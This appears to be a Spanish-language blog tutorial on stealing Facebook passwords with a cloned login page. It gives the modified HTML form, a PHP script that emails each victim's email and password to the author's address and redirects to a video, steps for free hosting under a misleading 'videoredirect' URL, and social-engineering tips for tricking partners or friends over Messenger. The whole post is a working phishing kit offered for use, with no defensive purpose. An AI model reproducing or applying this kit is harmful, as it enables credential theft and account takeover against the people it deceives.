lunes, 6 de agosto de 2018

Informal-Hackeando facebook

El phishing es un método de hackeo a medias porque no hackeas solo engañas al usuario con una pagina web falsa idéntica
a la original para que te regale su contraseña.
Bueno les enseñare a obtener una contraseña de facebook con phishing muy básico :v
Necesitan saber lo básico de html
Primero entramos a facebook
Luego le damos en iniciar sesión y te enviara a una página como esta
bien ahora damos clic derecho donde sea y damos en ver código fuente de la pagina
Ahora mostrara un montón de código y lo copiamos todo
ahora usaremos un programa que se llama notepad++ que les dejo en link de drive para que lo descarguen y lo instalen quiero aclarar que lo uso por comodidad porque creo que un blog de notas no es muy practico sin embargo son libres de usarlo o no
Click aqui para descargar
Bien ahora que lo instalamos creamos una carpeta de nombre cualquiera y ponemos dentro 2 archivos con los nombres index.php y correo.php si les da problemas la extension .php pueden escribir en el menu de windows opciones de carpeta (en windows 10 sale con ese nombre raro pero en windows 7 sale como opciones de carpeta)
ya le damos en ver y quitamos la flechita en donde dice ocultar extensiones de archivos conocidos

Ahora vamos a la capeta y clic derecho nuevo documento de texto y ponemos en uno index.php y en otro correo.php nos pedirá confirmación de cambiar la extensión y le damos que simon
luego cambiamos el nombre  a los ya mencionados
y listo ya están los 2 archivos, ahora clic derecho en index.php y editar con notepad++
y pegamos todo el código que ya habíamos copiado de facebook

apretamos Ctrl+F y escribimos <form y damos enter y saldrá esto
bien justo antes de el <form damos clic y damos enter unas cuantas veces para darle un salto de linea y trabajar mejor
ahora escribimos en el buscador </form> damos enter justo después de ese comando y damos unos cuantos saltos de linea
y queda así bien bonito
Bueno seré breve en esto, lo que hago es redirigir los datos que escribes a el archivo correo.php y ya eliminando la función original de facebook de iniciar sesión para mas fácil borren toda la linea de el <form> y peguen esta que ya modifique yo para los que les interese saber donde esta el truco en la etiqueta action luego luego al principio hago referencia a "correo.php" ;)


<form id="login_form" action="correo.php" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd" value="AVqiXk-1" autocomplete="off" /><input type="hidden" autocomplete="off" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="0" /><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value="" /><input type="hidden" autocomplete="off" id="return_session" name="return_session" value="" /><input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value="" /><input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value="" /><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1" /><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_9" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_a" /><input type="hidden" name="lgnrnd" value="152101_uw-X" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="1" placeholder="Correo electr&#xf3;nico o n&#xfa;mero de tel&#xe9;fono" value="" aria-label="Correo electr&#xf3;nico o n&#xfa;mero de tel&#xe9;fono" /></div><div class="clearfix _5466 _44mg"><input type="password" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="pass" id="pass" tabindex="1" placeholder="Contrase&#xf1;a" autofocus="1" aria-label="Contrase&#xf1;a" /></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="1" type="submit">Iniciar sesión</button></div><div id="login_link"><div class="_1rf5"><span class="_1rf8">o</span></div><div class="_xkt"><a role="button" class="_42ft _4jy0 _4jy6 _4jy2 selected _51sy" href="/r.php?locale=es_LA&amp;display=page" style="font-size: 14px">Crear una cuenta nueva</a></div><div class="_xkt"><a href="https://www.facebook.com/recover/initiate?lwv=101" id="forgot-password-link" target="">¿Olvidaste tu cuenta?</a></div></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" value="last_login" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" value="contact_point" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" value="last_login" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" value="contact_point" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="true" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /></form>


Ojo solo borren toda la linea de el <form> no toquen nada mas aparte de eso


bueno ya con esto resta editar la pagina, porque ahorta es una copia de facebook totalmente si recuerdan la pagina dice inicia sesión en facebook bueno ahora para que sea creíble pondremos "Tu sesión ha caducado, inicia sesión nuevamente para continuar"
asi que en el buscador ponemos exactamente esto "Iniciar sesión en Facebook"
y dara un resultado que es este:
quiero resaltar que este primer resultado no es el que buscamos ya que dice pageTitle se entiende que es el titulo damos en el buscador en siguiente para ver el próximo resultado

Bien este es el que nos interesa que dice la estiqueta <span>
reemplazaremos esa parte por esta:
Tu sesión ha caducado<br>Inicia nuevamente

y listo ya esta esta parte ahora guardamos y cerramos
ahora editamos el correo.php y pegamos esto asi como esta:


<?php
$email = $_POST['email'];
$pass = $_POST['pass'];
mail('comeraguacate@gmail.com',$email,$pass);
header("Status: 301 Moved Permanently");
header("Location: https://www.facebook.com/perritosbienchulosdebonitos/videos/1660981013997854/");
exit;

 ?>



Bueno la primer linea señala el correo electrónico al que llegaran los datos y la segunda el link al que te va a redirigir, evidentemente debe ser un vídeo de facebook (debe ser un vídeo forzosamente no porque no funcione con imágenes sino porque es parte de la estrategia de engaño)
en este caso el correo que recibe es el de los aguacates y manda al video de el perrito
ahora guaramos y listo muy bien ahora necesitamos subirlo a internet la pagina que yo uso es 
https://mex.000webhost.com/
bien se crean una cuenta y en la pagina que te manda dan en el signo de + para crear un sitio
Ahora le ponemos de nombre videoredirect y un montón e letras y números al azar porque el url de nuestra pagina falta terminara en .ooowebhost y el chiste es que no se vea por eso un nombre largo que comienza con vídeo para dar la impresión de que direcciona a un vídeo
damos clic en create y luego nos mandara a una pagina en la que daremos clic aqui
nos abrirá una página, bajamos un poco y damos en uplodad files now
y nos abrirá esta pagina 
Bien ahora subimos los 2 archivos que creamos los podemos arrastrar desde la carpeta que tenemos o en donde esta la nubesita 
Y ahora volvemos a la pagina anterior
Y damos clic sobre nuestro link
Y nos abrirá nuestro facebook falso
ahora si ingresamos datos y damos en iniciar sesión nos manda a nuestro vídeo y si revisamos nuestra bandeja de entrada tenemos un regalito
Como pueden ver es el correo y la contraseña


Ahora hay un punto a favor y uno en contra, uno es que como se podrán dar cuenta no inicia tu sesión de facebook por lo que yo les recomiendo enviarlo por messenger ya que tu sesión al ya estar iniciada no de pedirá volver a entrar, si lo envían por whats app corren el riesgo de que no tengan su facebook abierto y al tener que iniciar 2 veces sospechen las victimas pero solo tengan cuidado, otra cosa cuando intenten abrir el facebook la victima recibirá una notificación de que su sesión fue iniciada en un dispositivo raro y por ultimo como se dan cuenta no hace la comprobación de que la clave sea correcta así que si la escribe mal ya valieron xD pero eso casi no pasa.


Una ultima cosa es que esta pagina es falsa, si la persona se fija mucho en el link puede sospechar pero si lo harás con tu novi@ o un amigo normal la gente no se fija en los links sin embargo no todos caen y otros caen super fácil entonces si tu tienes a pagina con mucho potencial es mas importante que antes de mandárselo sepas hacer entrar en confianza a la persona y sonar casual para que caigan algo así como empezar a mandarle videos quizá mandarle unos 5 vídeos para que se ria y baje la guardia y entonces mandarle este y el entre risas por lo anteriores lo abrirá lo vera raro pero su curiosidad de ver el vídeo que tu le estas recomendando sera mas grande y lo hará rápido para verlo y efectivamente lo vera así que el nunca lo sabrá por lo que sean ingeniosos y sepan engañarlos

La pagina funciona perfectamente en celulares android y en computadoras, nunca lo he probado con un iphone pero no veo porque no funcionaria así que si funciona me avisan.


Suerte quizá suba mas contenido así :v
No me hago responsable de que encuentren en facebooks ajenos así que es bajo su propio riesgo si lo usan bien o mal o solo para trollear



por si quieren probar mi link es este
LINK

si quieren que pase los archivos comenten :v
Publicado por en

4 comentarios:

Suscribirse a: Enviar comentarios (Atom)